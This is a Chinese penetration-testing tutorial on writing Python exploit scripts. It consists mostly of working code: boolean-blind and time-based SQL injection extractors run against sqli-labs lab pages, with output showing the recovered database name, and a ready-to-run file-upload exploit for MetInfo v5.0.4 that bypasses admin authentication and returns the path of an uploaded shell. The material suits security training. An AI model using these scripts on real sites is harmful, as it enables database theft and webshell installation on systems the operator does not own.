[渗透测试]:python poc-exp
[渗透测试]:python poc-exp
python 编写EXP
exp 漏洞利用工具
以Web 漏洞为主
1、能够看懂别人写的exp,并修改
2、能自己写exp
基础环境 python3
核心模块 requests
requests模块
定制头部
重新定义User-Agent 信息
超时
GET 传参
POST 传参
文件上传
cookie 信息
用 python 脚本实现布尔盲注
以 sqli-labs Less-8 为例(以页面长度作为真/假的判定依据):
import requests
import string
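URL = "http://192.168.1.200/sqli-labs/Less-8/"
# Hard per-request timeout so a stalled target cannot hang the script forever
# (the original issued requests with no timeout at all).
TIMEOUT = 10
# Upper bound on the database-name length we are willing to probe.
MAX_NAME_LEN = 30
# Candidate characters per position. The original tried lowercase letters only;
# MySQL identifiers routinely contain digits and underscores, so include them.
# NOTE: with a case-insensitive collation (the MySQL default) 'a' also matches
# 'A', so an upper-case name is recovered in lower case.
CHARSET = string.ascii_lowercase + string.digits + "_"


def condition_url(base_url: str, condition: str) -> str:
    """Return the GET URL that injects ``condition`` into the ``id`` parameter.

    The injected value is ``1' and <condition>-- `` : ``+`` decodes to a
    space, so ``--+`` becomes a valid MySQL end-of-line comment that swallows
    the closing quote of the original query.
    """
    return f"{base_url}?id=1'+and+{condition}--+"


def length_oracle(base_url: str, normal_len: int, timeout: float = TIMEOUT):
    """Build a boolean oracle that uses the response length as side channel.

    The returned callable takes a SQL condition and reports True when the
    page served for ``id=1' and <condition>`` has the same length as the page
    served for the plain ``id=1`` request, i.e. the condition held.

    Network errors and timeouts propagate from ``requests.get`` instead of
    being mistaken for a "false" answer.
    """
    def ask(condition: str) -> bool:
        resp = requests.get(condition_url(base_url, condition), timeout=timeout)
        return len(resp.text) == normal_len
    return ask


def find_db_name_len(ask, max_len: int = MAX_NAME_LEN):
    """Return ``length(database())`` as reported by the oracle, or None.

    Probes lengths 0..max_len inclusive. None means no length matched, which
    usually indicates a broken injection point or oracle rather than a name
    that is genuinely longer than max_len.
    """
    for n in range(max_len + 1):
        if ask(f"length(database())={n}"):
            return n
    return None


def find_db_name(ask, name_len: int, charset: str = CHARSET) -> str:
    """Recover ``database()`` one character at a time through the oracle.

    Prints the partial name after every recovered character (blind
    extraction is slow, so progress output is useful).

    Raises RuntimeError when no candidate matches a position: the original
    silently skipped such positions, which shifted every later character and
    produced a wrong name with no warning.
    """
    recovered = []
    for pos in range(1, name_len + 1):
        for ch in charset:
            if ask(f"substr(database(),{pos},1)='{ch}'"):
                recovered.append(ch)
                print("The dbName :" + "".join(recovered))
                break
        else:
            raise RuntimeError(
                f"no candidate in charset matched position {pos}; "
                f"recovered so far: {''.join(recovered)!r}"
            )
    return "".join(recovered)


def main() -> None:
    """Run the boolean-blind extraction against URL and print progress."""
    normal_len = len(requests.get(URL + "?id=1", timeout=TIMEOUT).text)
    print("The len of HTML: " + str(normal_len))
    ask = length_oracle(URL, normal_len)
    # Sanity-check the side channel before spending dozens of requests per
    # character: a known-false condition must look different from a known-true one.
    if ask("1=2") or not ask("1=1"):
        print("ERROR! response length does not distinguish true from false")
        return
    name_len = find_db_name_len(ask)
    if name_len is None:
        print("ERROR!")
        return
    print("The len of dbNameLen: " + str(name_len))
    find_db_name(ask, name_len)


if __name__ == "__main__":
    main()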
------------
The len of HTML: 706
The len of dbNameLen: 8
The dbName :s
The dbName :se
The dbName :sec
The dbName :secu
The dbName :secur
The dbName :securi
The dbName :securit
The dbName :security
>>>
-----------
用 python 脚本实现延时注入(时间盲注)
以 sqli-labs Less-9 为例(页面无任何差异,只能以 sleep() 造成的响应延时作为判定依据):
import requests
import string
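URL = "http://192.168.1.200/sqli-labs/Less-9/"
# Seconds the injected sleep() lasts when the condition holds.
SLEEP_SECONDS = 5
# Client-side timeout. It must be shorter than SLEEP_SECONDS so a true
# condition is observed as a timeout, yet long enough to outlast the target's
# normal latency, otherwise slow responses are misread as "true".
TIMEOUT = 3
# Upper bound on the database-name length we are willing to probe.
MAX_NAME_LEN = 30
# Candidate characters per position. The original tried lowercase letters only;
# MySQL identifiers routinely contain digits and underscores, so include them.
# NOTE: with a case-insensitive collation (the MySQL default) 'a' also matches
# 'A', so an upper-case name is recovered in lower case.
CHARSET = string.ascii_lowercase + string.digits + "_"


def condition_url(base_url: str, condition: str) -> str:
    """Return the GET URL that injects ``condition`` into the ``id`` parameter.

    The injected value is ``1' and <condition>-- `` : ``+`` decodes to a
    space, so ``--+`` becomes a valid MySQL end-of-line comment.
    """
    return f"{base_url}?id=1'+and+{condition}--+"


def time_oracle(base_url: str, sleep_seconds: int = SLEEP_SECONDS,
                timeout: float = TIMEOUT):
    """Build a boolean oracle that uses ``sleep()`` as the side channel.

    The returned callable wraps the condition in
    ``if(<condition>,sleep(N),1)`` and reports True exactly when the request
    times out, i.e. the database slept because the condition held.

    Only ``requests.exceptions.Timeout`` is treated as "true". The original
    caught every exception, so a refused connection or DNS failure was
    indistinguishable from a true condition; those now propagate.
    """
    def ask(condition: str) -> bool:
        payload = f"if({condition},sleep({sleep_seconds}),1)"
        try:
            requests.get(condition_url(base_url, payload), timeout=timeout)
        except requests.exceptions.Timeout:
            return True
        return False
    return ask


def find_db_name_len(ask, max_len: int = MAX_NAME_LEN):
    """Return ``length(database())`` as reported by the oracle, or None.

    Probes lengths 0..max_len inclusive. None means no length matched, which
    usually indicates a broken injection point or oracle rather than a name
    that is genuinely longer than max_len.
    """
    for n in range(max_len + 1):
        if ask(f"length(database())={n}"):
            return n
    return None


def find_db_name(ask, name_len: int, charset: str = CHARSET) -> str:
    """Recover ``database()`` one character at a time through the oracle.

    Prints the partial name after every recovered character (each true
    answer costs a full sleep, so progress output matters here).

    Raises RuntimeError when no candidate matches a position: the original
    silently skipped such positions, which shifted every later character and
    produced a wrong name with no warning.
    """
    recovered = []
    for pos in range(1, name_len + 1):
        for ch in charset:
            if ask(f"substr(database(),{pos},1)='{ch}'"):
                recovered.append(ch)
                print("The dbName :" + "".join(recovered))
                break
        else:
            raise RuntimeError(
                f"no candidate in charset matched position {pos}; "
                f"recovered so far: {''.join(recovered)!r}"
            )
    return "".join(recovered)


def main() -> None:
    """Run the time-based extraction against URL and print progress."""
    ask = time_oracle(URL)
    # Sanity-check the side channel first: a known-true condition must time
    # out and a known-false one must not, or every later answer is noise.
    if ask("1=2") or not ask("1=1"):
        print("ERROR! sleep() delay is not observable with the current timeout")
        return
    name_len = find_db_name_len(ask)
    if name_len is None:
        print("ERROR!")
        return
    print("The Len of dbName: " + str(name_len))
    find_db_name(ask, name_len)


if __name__ == "__main__":
    main()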
---------------
The Len of dbName: 8
The dbName :s
The dbName :se
The dbName :sec
The dbName :secu
The dbName :secur
The dbName :securi
The dbName :securit
The dbName :security
>>>
-----------------
文件上传
以 MetInfo v5.0.4 为例(用法:python3 exp.py <站点根 URL> <要上传的文件>):
import requests
import sys
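# Path of the upload handler, relative to the MetInfo install root. The query
# string is kept verbatim from the original PoC. From the payload alone it
# appears that the ``%23`` (``#``) in met_admin_table comments out the rest of
# the admin-lookup SQL so any metinfo_admin_id/metinfo_admin_pass passes, and
# that ``met_file_format=jpg|pphphp`` survives a filter that strips one "php"
# (leaving "php") -- neither is verified here; confirm against the target.
UPLOAD_PATH = (
    "/admin/include/uploadify.php?metinfo_admin_id=aaa"
    "&metinfo_admin_pass=123.com&met_admin_table=met_admin_table%23"
    "&type=upfile&met_file_format=jpg|pphphp"
)
# Hard timeout so a stalled target cannot hang the script.
TIMEOUT = 15


def upload_url(base_url: str) -> str:
    """Return the full upload-handler URL for the MetInfo site at ``base_url``.

    ``base_url`` is the site root (e.g. ``http://host/metinfo``); a trailing
    slash is tolerated. The original concatenated the argument with a second,
    hard-coded absolute URL (and misspelled the variable), so it never ran.
    """
    return base_url.rstrip("/") + UPLOAD_PATH


def shell_url(base_url: str, response_text: str) -> str:
    """Derive the uploaded file's URL from the handler's response body.

    Mirrors the original PoC, which dropped the first four characters of the
    response and appended the remainder to the site root -- presumably the
    handler prefixes the stored path with a short status token. Verify the
    offset against a real response before relying on it.
    """
    return base_url.rstrip("/") + response_text[4:]


def main(argv) -> int:
    """Upload ``argv[2]`` to the MetInfo site at ``argv[1]``; return exit code.

    The original read the file path from an undefined ``path`` name and never
    closed the file handle.
    """
    if len(argv) != 3:
        print("usage: " + argv[0] + " <site-root-url> <file-to-upload>")
        return 2
    base_url, path = argv[1], argv[2]
    with open(path, "rb") as fh:
        res = requests.post(upload_url(base_url), files={"FileData": fh},
                            timeout=TIMEOUT)
    print("The Shell path:" + shell_url(base_url, res.text))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))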